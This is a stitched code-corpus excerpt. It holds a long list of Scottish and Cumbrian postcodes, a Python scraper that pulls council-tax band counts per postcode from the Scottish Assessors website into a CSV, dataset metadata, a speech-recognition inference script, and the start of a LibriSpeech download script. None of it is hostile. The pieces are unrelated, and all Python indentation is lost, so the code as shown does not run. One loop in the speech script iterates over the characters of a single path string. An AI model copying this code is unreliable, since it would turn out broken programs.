DG8 8PS
DG8 8PT
DG8 8PU
DG8 8PW
DG8 8PY
DG8 8PZ
DG8 8QA
DG8 8QB
DG8 8QE
DG8 8QF
DG8 8QG
DG8 8QH
DG8 8QJ
DG8 8QL
DG8 8QN
DG8 8QP
DG8 8QQ
DG8 8QW
DG8 9AA
DG8 9AB
DG8 9AD
DG8 9AF
DG8 9AG
DG8 9AH
DG8 9AL
DG8 9AN
DG8 9AP
DG8 9AQ
DG8 9AR
DG8 9AS
DG8 9AT
DG8 9AU
DG8 9AW
DG8 9AX
DG8 9AY
DG8 9AZ
DG8 9BA
DG8 9BB
DG8 9BD
DG8 9BE
DG8 9BG
DG8 9BH
DG8 9BJ
DG8 9BL
DG8 9BQ
DG8 9BT
DG8 9BX
DG8 9BY
DG8 9BZ
DG8 9DA
DG8 9DB
DG8 9DD
DG8 9DE
DG8 9DF
DG8 9DH
DG8 9DJ
DG8 9DL
DG8 9DQ
DG8 9DS
DG8 9DT
DG8 9DU
DG8 9DX
DG8 9DY
DG8 9DZ
DG8 9ED
DG8 9EE
DG8 9EF
DG8 9EG
DG8 9EH
DG8 9EJ
DG8 9EL
DG8 9EN
DG8 9EP
DG8 9EQ
DG8 9ER
DG8 9ES
DG8 9ET
DG8 9EU
DG8 9EW
DG8 9HG
DG8 9HH
DG8 9HJ
DG8 9HL
DG8 9HN
DG8 9HP
DG8 9HQ
DG8 9HR
DG8 9HS
DG8 9HT
DG8 9HU
DG8 9HW
DG8 9HX
DG8 9HY
DG8 9HZ
DG8 9JA
DG8 9JB
DG8 9JD
DG8 9JE
DG8 9JF
DG8 9JG
DG8 9JH
DG8 9JJ
DG8 9JL
DG8 9JN
DG8 9JP
DG8 9JQ
DG8 9JS
DG8 9JX
DG8 9JY
DG8 9JZ
DG8 9LA
DG8 9LB
DG8 9LD
DG8 9LE
DG8 9LG
DG8 9LH
DG8 9LJ
DG8 9LL
DG8 9LN
DG8 9LP
DG8 9LQ
DG8 9LR
DG8 9LS
DG8 9LT
DG8 9LU
DG8 9LW
DG8 9LX
DG8 9LY
DG8 9LZ
DG8 9NA
DG8 9NB
DG8 9ND
DG8 9NE
DG8 9NF
DG8 9NG
DG8 9NN
DG8 9NP
DG8 9NR
DG8 9NS
DG8 9NT
DG8 9NU
DG8 9NX
DG8 9NY
DG8 9NZ
DG8 9PA
DG8 9PB
DG8 9PD
DG8 9PE
DG8 9PF
DG8 9PG
DG8 9PH
DG8 9PJ
DG8 9PL
DG8 9PN
DG8 9PP
DG8 9PQ
DG8 9PR
DG8 9PS
DG8 9PT
DG8 9PU
DG8 9PW
DG8 9PX
DG8 9PY
DG8 9QA
DG8 9QB
DG8 9QE
DG8 9QH
DG8 9QJ
DG8 9QL
DG8 9QN
DG8 9QP
DG8 9QR
DG8 9QS
DG8 9QT
DG8 9QU
DG8 9QX
DG8 9QY
DG8 9QZ
DG8 9RA
DG8 9RB
DG8 9RD
DG8 9RE
DG8 9RF
DG8 9RG
DG8 9RH
DG8 9RJ
DG8 9RL
DG8 9RN
DG8 9RP
DG8 9RQ
DG8 9RR
DG8 9RS
DG8 9RT
DG8 9RU
DG8 9SA
DG8 9SB
DG8 9SD
DG8 9SE
DG8 9SG
DG8 9SH
DG8 9SJ
DG8 9SL
DG8 9SN
DG8 9SP
DG8 9SQ
DG8 9SR
DG8 9SW
DG8 9TA
DG8 9TB
DG8 9TD
DG8 9TE
DG8 9TF
DG8 9TG
DG8 9TH
DG8 9TJ
DG8 9TL
DG8 9TQ
DG9 0AA
DG9 0AB
DG9 0AD
DG9 0AE
DG9 0AF
DG9 0AG
DG9 0AH
DG9 0AJ
DG9 0AL
DG9 0AN
DG9 0AP
DG9 0AQ
DG9 0AR
DG9 0AS
DG9 0AT
DG9 0AU
DG9 0AW
DG9 0AX
DG9 0AY
DG9 0AZ
DG9 0BA
DG9 0BB
DG9 0BD
DG9 0BE
DG9 0BG
DG9 0BH
DG9 0BJ
DG9 0BL
DG9 0BN
DG9 0BP
DG9 0BQ
DG9 0BS
DG9 0BT
DG9 0BU
DG9 0BW
DG9 0BX
DG9 0BY
DG9 0BZ
DG9 0DA
DG9 0DB
DG9 0DD
DG9 0DE
DG9 0DF
DG9 0DG
DG9 0DH
DG9 0DJ
DG9 0DL
DG9 0DN
DG9 0DQ
DG9 0DS
DG9 0DT
DG9 0DU
DG9 0DX
DG9 0DY
DG9 0DZ
DG9 0EA
DG9 0EB
DG9 0ED
DG9 0EE
DG9 0EF
DG9 0EG
DG9 0EH
DG9 0EJ
DG9 0EL
DG9 0EN
DG9 0EP
DG9 0EQ
DG9 0ER
DG9 0ES
DG9 0ET
DG9 0EU
DG9 0EW
DG9 0EX
DG9 0EY
DG9 0EZ
DG9 0HA
DG9 0HB
DG9 0HD
DG9 0HE
DG9 0HF
DG9 0HG
DG9 0HH
DG9 0HL
DG9 0HQ
DG9 0HS
DG9 0HW
DG9 0HX
DG9 0HY
DG9 0HZ
DG9 0JA
DG9 0JB
DG9 0JD
DG9 0JE
DG9 0JF
DG9 0JH
DG9 0JJ
DG9 0JL
DG9 0JN
DG9 0JP
DG9 0JQ
DG9 0JT
DG9 0JZ
DG9 0LA
DG9 0LB
DG9 0LD
DG9 0LE
DG9 0LF
DG9 0LG
DG9 0LH
DG9 0LJ
DG9 0LL
DG9 0LN
DG9 0LP
DG9 0LQ
DG9 0LR
DG9 0LS
DG9 0LT
DG9 0LU
DG9 0LW
DG9 0LX
DG9 0LY
DG9 0LZ
DG9 0NA
DG9 0NB
DG9 0ND
DG9 0NE
DG9 0NL
DG9 0NN
DG9 0NP
DG9 0NS
DG9 0NT
DG9 0NU
DG9 0NW
DG9 0NX
DG9 0NY
DG9 0NZ
DG9 0PA
DG9 0PB
DG9 0PD
DG9 0PE
DG9 0PL
DG9 0PN
DG9 0PP
DG9 0PR
DG9 0PS
DG9 0PT
DG9 0PU
DG9 0PW
DG9 0PX
DG9 0PY
DG9 0PZ
DG9 0QA
DG9 0QB
DG9 0QD
DG9 0QE
DG9 0QF
DG9 0QG
DG9 0QP
DG9 0QQ
DG9 0QR
DG9 0QS
DG9 0QT
DG9 0QU
DG9 0QX
DG9 0QY
DG9 0QZ
DG9 0RA
DG9 0RB
DG9 0RD
DG9 0RE
DG9 0RF
DG9 0RG
DG9 0RH
DG9 0RJ
DG9 0RL
DG9 0RN
DG9 0RP
DG9 0RQ
DG9 0RR
DG9 0RS
DG9 0RT
DG9 0RU
DG9 0RW
DG9 0RX
DG9 0RY
DG9 1AB
DG9 7AA
DG9 7AB
DG9 7AD
DG9 7AE
DG9 7AF
DG9 7AG
DG9 7AH
DG9 7AJ
DG9 7AL
DG9 7AN
DG9 7AP
DG9 7AQ
DG9 7AR
DG9 7AS
DG9 7AT
DG9 7AU
DG9 7AW
DG9 7AX
DG9 7AY
DG9 7AZ
DG9 7BA
DG9 7BB
DG9 7BD
DG9 7BE
DG9 7BG
DG9 7BH
DG9 7BJ
DG9 7BL
DG9 7BN
DG9 7BP
DG9 7BQ
DG9 7BS
DG9 7BT
DG9 7BU
DG9 7BW
DG9 7BX
DG9 7BY
DG9 7BZ
DG9 7DA
DG9 7DB
DG9 7DD
DG9 7DE
DG9 7DF
DG9 7DH
DG9 7DL
DG9 7DN
DG9 7DQ
DG9 7DR
DG9 7DS
DG9 7DU
DG9 7DW
DG9 7DX
DG9 7DZ
DG9 7EA
DG9 7EB
DG9 7ED
DG9 7EE
DG9 7EF
DG9 7EG
DG9 7EH
DG9 7EJ
DG9 7EL
DG9 7EN
DG9 7EP
DG9 7ER
DG9 7ES
DG9 7ET
DG9 7EU
DG9 7EW
DG9 7EX
DG9 7EY
DG9 7EZ
DG9 7FB
DG9 7FD
DG9 7FE
DG9 7FG
DG9 7FH
DG9 7FJ
DG9 7GA
DG9 7HA
DG9 7HB
DG9 7HD
DG9 7HE
DG9 7HF
DG9 7HH
DG9 7HJ
DG9 7HL
DG9 7HN
DG9 7HP
DG9 7HR
DG9 7HS
DG9 7HT
DG9 7HU
DG9 7HW
DG9 7HX
DG9 7HY
DG9 7JA
DG9 7JB
DG9 7JE
DG9 7JF
DG9 7JG
DG9 7JH
DG9 7JJ
DG9 7JL
DG9 7JN
DG9 7JP
DG9 7JS
DG9 7JU
DG9 7JW
DG9 7JY
DG9 7JZ
DG9 7LA
DG9 7LB
DG9 7LD
DG9 7LF
DG9 7LG
DG9 7LH
DG9 7LJ
DG9 7LL
DG9 7LN
DG9 7LP
DG9 7LQ
DG9 7LR
DG9 7LS
DG9 7LT
DG9 7LU
DG9 7LW
DG9 7LX
DG9 7LY
DG9 7LZ
DG9 7NA
DG9 7NB
DG9 7ND
DG9 7NE
DG9 7NF
DG9 7NG
DG9 7NH
DG9 7NL
DG9 7NN
DG9 7NP
DG9 7NQ
DG9 7NS
DG9 7NU
DG9 7NW
DG9 7NX
DG9 7NY
DG9 7NZ
DG9 7PA
DG9 7PB
DG9 7PD
DG9 7PG
DG9 7PH
DG9 7PJ
DG9 7PQ
DG9 7PT
DG9 7PU
DG9 7PW
DG9 7PX
DG9 7PY
DG9 7PZ
DG9 7QA
DG9 7QB
DG9 7QD
DG9 7QE
DG9 7QF
DG9 7QG
DG9 7QH
DG9 7QJ
DG9 7QL
DG9 7QN
DG9 7QP
DG9 7QQ
DG9 7QR
DG9 7QS
DG9 7QT
DG9 7QU
DG9 7QW
DG9 7QX
DG9 7QY
DG9 7QZ
DG9 8TQ
DG9 8TR
DG9 8TS
DG9 8TT
DG9 8TW
DG9 8TX
DG9 8TY
DG9 8TZ
DG9 8UA
DG9 8UB
DG9 8WX
DG9 9AA
DG9 9AB
DG9 9AD
DG9 9AE
DG9 9AF
DG9 9AG
DG9 9AH
DG9 9AJ
DG9 9AL
DG9 9AN
DG9 9AP
DG9 9AQ
DG9 9AR
DG9 9AS
DG9 9AT
DG9 9AU
DG9 9AW
DG9 9AX
DG9 9AZ
DG9 9BA
DG9 9BB
DG9 9BD
DG9 9BE
DG9 9BG
DG9 9BH
DG9 9BJ
DG9 9BL
DG9 9BN
DG9 9BP
DG9 9BQ
DG9 9BS
DG9 9BT
DG9 9BU
DG9 9BW
DG9 9BX
DG9 9BY
DG9 9BZ
DG9 9DB
DG9 9DE
DG9 9DF
DG9 9DG
DG9 9DH
DG9 9DJ
DG9 9DL
DG9 9DN
DG9 9DP
DG9 9DQ
DG9 9DR
DG9 9DU
DG9 9DW
DG9 9DX
DG9 9DY
DG9 9DZ
DG9 9EA
DG9 9EB
DG9 9ED
DG9 9EE
DG9 9EF
DG9 9EG
DG9 9EH
DG9 9EN
DG9 9EQ
DG9 9ES
DG9 9ET
DG9 9EU
DG9 9EX
DG9 9HA
DG9 9HB
DG9 9HD
DG9 9HE
DG9 9HF
DG9 9HG
DG9 9HH
DG9 9HJ
DG9 9HL
DG9 9HN
DG9 9HP
DG9 9HQ
DG9 9HR
DG9 9HS
DG9 9HW
DG9 9JA
DG9 9JB
DG9 9JD
DG9 9JE
DG9 9JF
DG9 9JG
DG9 9JH
DG9 9JJ
DG9 9JL
DG9 9JN
DG9 9JP
DG9 9JQ
DG9 9JR
DG9 9JS
DG9 9JT
DG9 9JU
DG9 9JW
DG9 9JX
DG9 9JY
DG9 9JZ
DG9 9LA
DG9 9LB
DG9 9LD
DG9 9LE
DG9 9LF
DG9 9LG
DG9 9LH
DG9 9LJ
DG9 9LL
DG9 9LQ
DG9 9LS
DG9 9LT
DG9 9LU
DG9 9LX
DG9 7RA
DG9 7RB
DG9 7RD
DG9 7RE
DG9 7RF
DG9 7RH
DG9 7RJ
DG9 7RL
DG9 7RN
DG9 7RP
DG9 7RQ
DG9 7RR
DG9 7RS
DG9 7RT
DG9 7RW
DG9 7RX
DG9 7RY
DG9 7RZ
DG9 7SA
DG9 7SB
DG9 7SD
DG9 7SE
DG9 7SF
DG9 7SG
DG9 7SJ
DG9 7SL
DG9 7SN
DG9 7SP
DG9 7SQ
DG9 7SR
DG9 7SS
DG9 7ST
DG9 7SU
DG9 7SW
DG9 7SX
DG9 7SY
DG9 7SZ
DG9 7TA
DG9 7TB
DG9 7TE
DG9 7TF
DG9 7TG
DG9 7TH
DG9 7TJ
DG9 7TL
DG9 7TN
DG9 7TP
DG9 7TQ
DG9 7TR
DG9 7TS
DG9 7TT
DG9 7TU
DG9 7TW
DG9 7TY
DG9 7UD
DG9 7UE
DG9 7UF
DG9 8AA
DG9 8AB
DG9 8AD
DG9 8AE
DG9 8AF
DG9 8AG
DG9 8AH
DG9 8AJ
DG9 8AN
DG9 8AP
DG9 8AQ
DG9 8AR
DG9 8AS
DG9 8AT
DG9 8AU
DG9 8AW
DG9 8AX
DG9 8AY
DG9 8AZ
DG9 8BA
DG9 8BB
DG9 8BD
DG9 8BE
DG9 8BF
DG9 8BG
DG9 8BH
DG9 8BJ
DG9 8BL
DG9 8BN
DG9 8BP
DG9 8BQ
DG9 8BS
DG9 8BT
DG9 8BU
DG9 8BW
DG9 8BX
DG9 8BY
DG9 8BZ
DG9 8DA
DG9 8DB
DG9 8DD
DG9 8DE
DG9 8DF
DG9 8DG
DG9 8DH
DG9 8DJ
DG9 8DL
DG9 8DP
DG9 8DQ
DG9 8DR
DG9 8DS
DG9 8DT
DG9 8DU
DG9 8DX
DG9 8DY
DG9 8ED
DG9 8EE
DG9 8EG
DG9 8EH
DG9 8EJ
DG9 8EP
DG9 8ER
DG9 8ES
DG9 8ET
DG9 8EU
DG9 8EX
DG9 8EY
DG9 8EZ
DG9 8HA
DG9 8HB
DG9 8HG
DG9 8HH
DG9 8HJ
DG9 8HL
DG9 8HN
DG9 8HP
DG9 8HQ
DG9 8HT
DG9 8HU
DG9 8HW
DG9 8HX
DG9 8HY
DG9 8HZ
DG9 8JA
DG9 8JB
DG9 8JD
DG9 8JE
DG9 8JG
DG9 8LA
DG9 8LB
DG9 8LD
DG9 8LE
DG9 8LF
DG9 8LG
DG9 8LH
DG9 8LJ
DG9 8LN
DG9 8LP
DG9 8LQ
DG9 8LR
DG9 8LX
DG9 8LY
DG9 8LZ
DG9 8NA
DG9 8NB
DG9 8ND
DG9 8NE
DG9 8NJ
DG9 8NL
DG9 8NN
DG9 8NP
DG9 8NR
DG9 8NU
DG9 8NW
DG9 8NX
DG9 8NY
DG9 8NZ
DG9 8PA
DG9 8PB
DG9 8PD
DG9 8PF
DG9 8PG
DG9 8PH
DG9 8PJ
DG9 8PL
DG9 8PP
DG9 8PQ
DG9 8PR
DG9 8PS
DG9 8PT
DG9 8PW
DG9 8PX
DG9 8PY
DG9 8PZ
DG9 8QA
DG9 8QB
DG9 8QH
DG9 8SA
DG9 8SB
DG9 8SD
DG9 8SE
DG9 8SF
DG9 8SG
DG9 8SH
DG9 8SJ
DG9 8SL
DG9 8SN
DG9 8SP
DG9 8SQ
DG9 8SR
DG9 8SU
DG9 8SW
DG9 8SX
DG9 8SY
DG9 8SZ
DG9 8TA
DG9 8TB
DG9 8TD
DG9 8TE
DG9 8TF
DG9 8TH
DG9 8TJ
DG9 8TL
DG9 8TN
DG9 8TP
DG9 9LY
DG9 9LZ
DG9 9NA
DG9 9NB
DG9 9ND
DG9 9NE
DG9 9NF
DG9 9NG
DG9 9NH
DG9 9NJ
DG9 9NL
DG9 9NN
DG9 9NP
DG9 9NQ
DG9 9NR
DG9 9NS
DG9 9NT
DG9 9NU
DG9 9NW
DG9 9NX
DG9 9NY
DG9 9NZ
DG9 9PA
DG9 9PB
DG9 9PD
DG9 9PE
DG9 9PF
DG9 9PG
DG9 9PH
DG9 9PJ
DG9 9PQ
DG9 9PS
DG9 9PT
DG9 9PU
DG9 9PX
DG9 9PY
DG9 9PZ
DG9 9QA
DG9 9QD
DG9 9QE
DG9 9QF
DG9 9QG
DG9 9QL
DG9 9QN
DG9 9QP
DG9 9QQ
DG9 9QR
DG9 9QS
DG9 9QT
DG9 9QU
DG9 9QW
DG9 9QX
DG9 9QY
DG9 9QZ
DG9 9RB
DG9 9RD
DG9 9WT
DG9 9WW
ML12 6FR
ML12 6UH
ML12 6UJ
ML12 6UN
ML12 6UP
ML12 6UR
ML12 6UT
ML12 6UU
ML12 6UW
ML12 6UX
ML12 6UY
ML12 6UZ
ML12 6WT
ML12 6XA
ML12 6XB
ML12 6XD
ML12 6XE
ML12 6XF
ML12 6XG
ML12 6XH
ML12 6XJ
ML12 6XL
ML12 6XQ
DG11 3HS
DG12 5LG
DG12 5RW
DG12 6AE
DG12 6AH
DG12 6AX
DG12 6BL
DG12 6BP
DG12 6NP
DG12 6PL
DG12 6RE
DG12 6TA
DG13 0ED
DG13 0EL
DG13 0JA
DG13 0JJ
DG13 0JU
DG13 0LA
DG13 0LX
DG13 0PH
DG14 0RG
DG2 0BS
DG2 0LH
DG2 0LN
DG2 0NA
DG2 0NT
DG2 0NX
DG2 0NY
DG2 0PX
DG2 0RN
DG2 0SQ
DG2 0UQ
DG2 7BN
DG2 7BQ
DG2 7DP
DG2 7EG
DG2 7HD
DG2 7HP
DG2 7HW
DG2 7SG
DG2 8BA
DG2 8NT
DG2 8PG
DG2 8PQ
DG2 9AJ
DG2 9AT
DG2 9BB
DG2 9BJ
DG2 9DA
DG2 9DU
DG2 9DY
DG2 9HD
DG2 9SW
DG3 4AA
DG3 4DT
DG3 4EP
DG3 4HG
DG3 4JH
DG3 4LW
DG3 5DE
DG3 5DU
DG3 5HF
DG3 5HS
DG3 5LR
DG3 5LT
DG4 6BE
DG4 6DD
DG4 6EA
DG4 6EE
DG4 6HP
CA6 5AA
CA6 5AB
CA6 5AD
CA6 5AE
CA6 5AF
CA6 5AG
CA6 5AH
CA6 5AJ
CA6 5AL
CA6 5AN
CA6 5AP
CA6 5AQ
CA6 5AR
CA6 5AS
CA6 5AT
CA6 5AU
CA6 5AW
CA6 5AX
CA6 5AY
CA6 5AZ
CA6 5BA
CA6 5BB
CA6 5BD
CA6 5BE
CA6 5BG
CA6 5BH
CA6 5BJ
CA6 5BL
CA6 5BN
CA6 5BP
CA6 5BQ
CA6 5BS
CA6 5BT
CA6 5BU
CA6 5BW
CA6 5BX
CA6 5BY
CA6 5BZ
CA6 5DA
CA6 5DB
CA6 5DD
CA6 5DE
CA6 5DF
CA6 5DG
CA6 5DH
CA6 5DJ
CA6 5DL
CA6 5DN
CA6 5DP
CA6 5DQ
CA6 5DR
CA6 5DS
CA6 5DT
CA6 5DU
CA6 5DW
CA6 5DX
CA6 5DY
CA6 5DZ
CA6 5EA
CA6 5EB
CA6 5ED
CA6 5EE
CA6 5EF
CA6 5EG
CA6 5EH
CA6 5EJ
CA6 5EL
CA6 5EN
CA6 5EP
CA6 5EQ
CA6 5ER
CA6 5ES
CA6 5ET
CA6 5EU
CA6 5EW
CA6 5EX
CA6 5EY
CA6 5EZ
CA6 5HA
CA6 5HB
CA6 5HD
CA6 5HE
CA6 5HF
CA6 5HG
CA6 5HH
CA6 5HJ
CA6 5HL
CA6 5HN
CA6 5HP
CA6 5HQ
CA6 5HR
CA6 5HS
CA6 5HW
CA6 5HX
CA6 5HY
CA6 5HZ
CA6 5JD
CA6 5JE
CA6 5JF
CA6 5JG
CA6 5JH
CA6 5JJ
CA6 5JL
CA6 5JN
CA6 5JP
CA6 5JQ
CA6 5JR
CA6 5JS
CA6 5JT
CA6 5JU
CA6 5JW
CA6 5JX
CA6 5JZ
CA6 5LA
CA6 5LB
CA6 5LD
CA6 5LE
DG1 1AD
DG1 1AE
DG1 1AU
DG1 1BB
DG1 1BN
DG1 1BQ
DG1 1DH
DG1 1DN
DG1 1DP
DG1 1DQ
DG1 1LY
DG1 1NB
DG1 1ND
DG1 1NU
DG1 1NX
DG1 1PH
DG1 1PQ
DG1 1PY
DG1 1QT
DG1 1SB
DG1 1SN
DG1 1TJ
DG1 2AF
DG1 2AQ
DG1 2AS
DG1 2AU
DG1 2AY
DG1 2BB
DG1 2BL
DG1 2BP
DG1 2BW
DG1 2BX
DG1 2BZ
DG1 2DH
DG1 2DW
DG1 2EA
DG1 2EG
DG1 2ES
DG1 2HW
DG1 2LD
DG1 1DS
DG1 1DY
DG1 1DZ
DG1 1EE
DG1 1EN
DG1 1EQ
DG1 1ER
DG1 1ES
DG1 1EY
DG1 1EZ
DG1 1HQ
DG1 1HT
DG1 1JS
DG1 1LA
DG1 1LL
DG1 1LQ
DG1 1XX
DG1 2LW
DG1 2NW
DG1 2NY
DG1 2PT
DG1 2PU
DG1 2QA
DG1 2QJ
DG1 2QU
DG1 2QY
DG1 2QZ
DG1 2RD
DG1 2RG
DG1 2RJ
DG1 2SB
DG1 3AA
DG1 3AF
DG1 3BG
DG1 3BS
DG1 3DH
DG1 3EH
DG1 3EL
DG1 3ER
DG1 3HD
DG1 3JT
DG1 3PZ
DG1 3QQ
DG1 3TX
DG1 4EL
DG1 4JD
DG1 4SZ
DG1 4US
DG1 4WQ
DG1 4ZA
DG1 4ZB
DG1 4ZG
DG1 4ZH
DG1 4ZY
DG10 9AF
DG10 9AU
DG10 9DZ
DG10 9EN
DG10 9EQ
DG10 9EW
DG10 9GZ
DG10 9NQ
DG10 9QD
DG10 9QY
DG11 1EE
DG11 1SD
DG11 2BN
DG11 2BW
DG11 2DD
DG11 2HD
DG11 2HS
DG11 2JN
DG11 2JW
DG11 2LT
DG4 6JR
DG4 6LH
DG4 6LT
DG4 6NF
DG4 6NG
DG4 6NH
DG4 6PJ
DG4 6PP
DG4 6PS
DG4 6PT
DG4 6PX
DG4 6QD
DG4 6QE
DG4 6QF
DG4 6QG
DG4 6RU
DG4 6RW
DG4 6SQ
DG4 6YT
DG5 4BD
DG5 4JQ
DG5 4NG
DG5 4UL
DG6 4AB
DG6 4AY
DG6 4DG
DG6 4EE
DG6 4ET
DG6 4LN
DG6 4PL
DG6 4QX
DG6 4RY
DG6 4UF
DG6 4UQ
DG7 1AS
DG7 1AW
DG7 1DF
DG7 1DP
DG7 1DY
DG7 1HT
DG7 1HW
DG7 1JR
DG7 1JW
DG7 1PJ
DG7 1PZ
DG7 2HN
DG7 2NH
DG7 3JP
DG7 3JR
DG7 3JS
DG8 0AR
DG8 0BP
DG8 0ES
DG8 0EW
DG8 0LQ
DG8 0PG
DG8 0QS
DG8 6BU
DG8 6BY
DG8 6DP
DG8 6ED
DG8 6HS
DG8 6JP
DG8 6JU
DG8 6NJ
DG8 6NN
DG8 6RF
DG8 6RG
DG8 6SQ
DG8 6ST
DG8 7AP
DG8 7AY
DG8 7DD
DG8 7DJ
DG8 7JD
DG8 8LW
DG8 8NX
DG8 8PA
DG8 8PR
DG8 8QD
DG8 9AE
DG8 9AJ
DG8 9DG
DG8 9LF
DG8 9NQ
DG8 9PZ
DG8 9RW
DG8 9SF
DG9 0HN
DG9 0JG
DG9 0JW
DG9 0RZ
DG9 7DG
DG9 7DJ
DG9 7DP
DG9 7DT
DG9 7DY
DG9 7EQ
DG9 7HG
DG9 7HQ
DG9 7HZ
DG9 7JD
DG9 7JR
DG9 7JT
DG9 7JX
DG9 7LE
DG9 7NJ
DG9 7NR
DG9 7NT
DG9 7PE
DG9 7PF
DG9 7PL
DG9 7PN
DG9 7PP
DG9 7PR
DG9 7PS
DG9 7RG
DG9 7RU
DG9 7SH
DG9 7UA
DG9 7UB
DG9 8EF
DG9 8EL
DG9 8EN
DG9 8EQ
DG9 8JF
DG9 8LL
DG9 8NH
DG9 8PE
DG9 8PN
DG9 8PU
DG9 8RW
DG9 8RZ
DG9 8TG
DG9 8TU
DG9 9DS
DG9 9DT
DG9 9RA
ML12 6XN
DG1 3FJ
DG1 3FR
DG1 3FU
DG1 3GF
DG1 3GJ
DG1 3GW
DG1 9DW
DG11 1UF
DG12 6GX
DG2 9RG
DG3 5JB
DG3 5PE
DG3 9AA
DG5 4FE
DG5 4GX
DG6 4RE
DG6 4RF
DG6 4RG
DG6 4TB
DG7 1LP
DG7 2EL
DG7 3UJ
DG7 3UL
DG9 7TZ
DG1 3QZ
DG2 9RB"""
array = array.split('\n')
arrayPostCodes = array.copy()
arrayBands = [[0 for x in range(8)] for x in range(len(array))]
charA = 'A'
for i in range(0, len(array)):
array[i] = array[i].replace(' ', '+')
def Connect2Web(postcode, index):
req = urllib.request.Request("http://www.saa.gov.uk/dumgal/search.php?SEARCHED=1&ST&SEARCH_TERM=" + postcode + "&ASSESSOR_ID=dumgal&SEARCH_TABLE=council_tax&x=0&y=0&DISPLAY_COUNT=100#results")
resp = urllib.request.urlopen(req)
web_pg = resp.read();
#print (web_pg)
#regex = "<td style='text-align:center;'>[A-H]</td>"
##localityRegex ="Please select one of the following "
localityPattern = re.compile(b"Please select one of the following ")
locality = re.findall(localityPattern, web_pg)
if (len(locality) != 0):
bandList = []
hrefPattern = re.compile(b'\/dumgal\/search\.php\?[^"]*')
allLinks = re.findall(hrefPattern, web_pg)
for i in range(1, len(allLinks)):
allLinks[i] = allLinks[i].decode("utf-8")
allLinks[i] = allLinks[i].replace("&", "&")
req = urllib.request.Request("http://www.saa.gov.uk" + allLinks[i])
print ("http://www.saa.gov.uk" + allLinks[i])
resp = urllib.request.urlopen(req)
web_pg = resp.read()
#print (web_pg)
pattern = re.compile(b"<td style='text-align:center;'>[A-H]</td>")
m = re.findall(pattern, web_pg)
#print (m)
for i in range (0, len(m)):
m[i] = m[i].decode("utf-8")
bandList.append(m[i][-6])
for i in range(0, 7):
arrayBands[index][i] = bandList.count(chr(ord('A') + i ) )
print (arrayBands[index])
else :
pattern = re.compile(b"<td style='text-align:center;'>[A-H]</td>")
m = re.findall(pattern, web_pg)
for i in range (0, len(m)):
m[i] = m[i].decode("utf-8")
m[i] = m[i][-6]
for i in range(0, 7):
arrayBands[index][i] = m.count(chr(ord('A') + i ) )
with open('bands.csv', 'a', newline='') as fp:
a = csv.writer(fp, delimiter=',')
a.writerow(['Postcode','A','B','C','D','E','F','G','H'])
for i in range(0, len(array)):
print (i)
Connect2Web(array[i], i)
a.writerow([arrayPostCodes[i]] + arrayBands[i])
``` |
{
"source": "2091527886/mockbirdremark",
"score": 2
} |
#### File: 2091527886/mockbirdremark/makedataset.py
```python
import argparse
from ast import arg
import functools
from matplotlib.pyplot import get
from masr.masr import infer_path
from masr.masr.predict import Predictor
from masr.masr.utils.utils import add_arguments, print_arguments
parser = argparse.ArgumentParser(description=__doc__)
add_arg = functools.partial(add_arguments, argparser=parser)
add_arg('wav_path', str, './dataset/test.wav', "预测音频的路径")
add_arg('real_time_demo', bool, False, "是否使用实时语音识别演示")
add_arg('use_gpu', bool, True, "是否使用GPU预测")
add_arg('to_an', bool, False, "是否转为阿拉伯数字")
add_arg('use_pun', bool, False, "是否给识别结果加标点符号")
add_arg('nomoreoutput', bool, False, "是否太多输出")
add_arg('beam_size', int, 300, "集束搜索解码相关参数,搜索的大小,范围建议:[5, 500]")
add_arg('alpha', float, 2.2, "集束搜索解码相关参数,LM系数")
add_arg('beta', float, 4.3, "集束搜索解码相关参数,WC系数")
add_arg('cutoff_prob', float, 0.99, "集束搜索解码相关参数,剪枝的概率")
add_arg('cutoff_top_n', int, 40, "集束搜索解码相关参数,剪枝的最大值")
add_arg('use_model', str, 'deepspeech2', "所使用的模型")
add_arg('vocab_path', str, 'dataset/vocabulary.txt', "数据集的词汇表文件路径")
add_arg('pun_model_dir', str, 'models/pun_models/', "加标点符号的模型文件夹路径")
add_arg('model_path', str, 'models/deepspeech2/inference.pt', "导出的预测模型文件路径")
add_arg('lang_model_path', str, 'lm/zh_giga.no_cna_cmn.prune01244.klm', "集束搜索解码相关参数,语言模型文件路径")
add_arg('feature_method', str, 'linear', "音频预处理方法", choices=['linear', 'mfcc', 'fbank'])
add_arg('decoder', str, 'ctc_beam_search', "结果解码方法", choices=['ctc_beam_search', 'ctc_greedy'])
add_arg('output', str, '233333333333333', "结果解码方法",)
print ("-------------------------------------")
args = parser.parse_args()
print_arguments(args)
print ("-------------------------------------")
predictor = Predictor(model_path=args.model_path, vocab_path=args.vocab_path, use_model=args.use_model,
decoder=args.decoder, alpha=args.alpha, beta=args.beta, lang_model_path=args.lang_model_path,
beam_size=args.beam_size, cutoff_prob=args.cutoff_prob, cutoff_top_n=args.cutoff_top_n,
use_gpu=args.use_gpu, use_pun_model=args.use_pun, pun_model_dir=args.pun_model_dir,
feature_method=args.feature_method)
def get1(x):
score, text = predictor.predict(audio_path=x, to_an=args.to_an)
return(text)
wavpath=args.wav_path
pathtemp=""
#{
#
#
#
#
#
#
#
#
# open ....
#
# from wav path
#
#
#
#
#
#
#
#
#
# }
returnback=""
for x in wavpath:
pathtemp=x
returnback = get1(pathtemp)
#/n
```
#### File: masr/download_data/librispeech.py
```python
import argparse
import io
import os
from utility import download, unpack
URL_ROOT = "https://openslr.magicdatatech.com/resources/12"
URL_TEST_CLEAN = URL_ROOT + "/test-clean.tar.gz"
URL_TEST_OTHER = URL_ROOT + "/test-other.tar.gz"
URL_DEV_CLEAN = URL_ROOT + "/dev-clean.tar.gz"
URL_DEV_OTHER = URL_ROOT + "/dev-other.tar.gz"
URL_TRAIN_CLEAN_100 = URL_ROOT + "/train-clean-100.tar.gz"
URL_TRAIN_CLEAN_360 = URL_ROOT + "/train-clean-360.tar.gz"
URL_TRAIN_OTHER_500 = URL_ROOT + "/train-other-500.tar.gz"
MD5_TEST_CLEAN = "32fa31d27d2e1cad72775fee3f4849a9"
MD5_TEST_OTHER = "fb5a50374b501bb3bac4815ee91d3135"
MD5_DEV_CLEAN = "42e2234ba48799c1f50f24a7926300a1"
MD5_DEV_OTHER = "c8d0bcc9cca99d4f8b62fcc847357931"
MD5_TRAIN_CLEAN_100 = "2a93770f6d5c6c964bc36631d331a522"
MD5_TRAIN_CLEAN_360 = "c0e676e450a7ff2f54aeade5171606fa"
MD5_TRAIN_OTHER_500 = "d1a0fd59409feb2c614ce4d30c387708"
